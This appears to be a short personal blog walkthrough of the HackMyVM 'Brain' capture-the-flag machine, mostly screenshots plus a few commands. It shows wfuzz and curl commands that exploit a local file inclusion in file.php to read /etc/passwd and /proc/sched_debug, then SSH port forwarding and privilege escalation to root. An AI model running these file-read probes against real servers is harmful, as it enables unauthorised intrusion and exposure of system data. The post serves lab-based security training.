Windy's little blog

一切生活中的杂七杂八, and I like CTF.

HackMyVm Brain Walkthrough (LFI)

Machine can be download here.


Nmap scan ports.

图片.png


Brutefoce port 80.

图片.png


Go on bruteforce in /brainstorm.

图片.png

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hh 0  'http://192.168.56.54/brainstorm/file.php?FUZZ=/etc/passwd'

图片.png


curl http://192.168.56.54/brainstorm/file.php\?file\=/etc/passwd

图片.png


curl http://192.168.56.54/brainstorm/file.php\?file\=/proc/sched_debug

图片.png


Ssh in as user salomon.

图片.png


Upload netstat and check ports.

图片.png


Port forward 65000.

ssh -L 65000:127.0.0.1:65000 salomon@192.168.56.54


Check port 65000.

图片.png


Crack it online.

图片.png


Su root.

图片.png

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Powered By Z-BlogPHP 1.7.0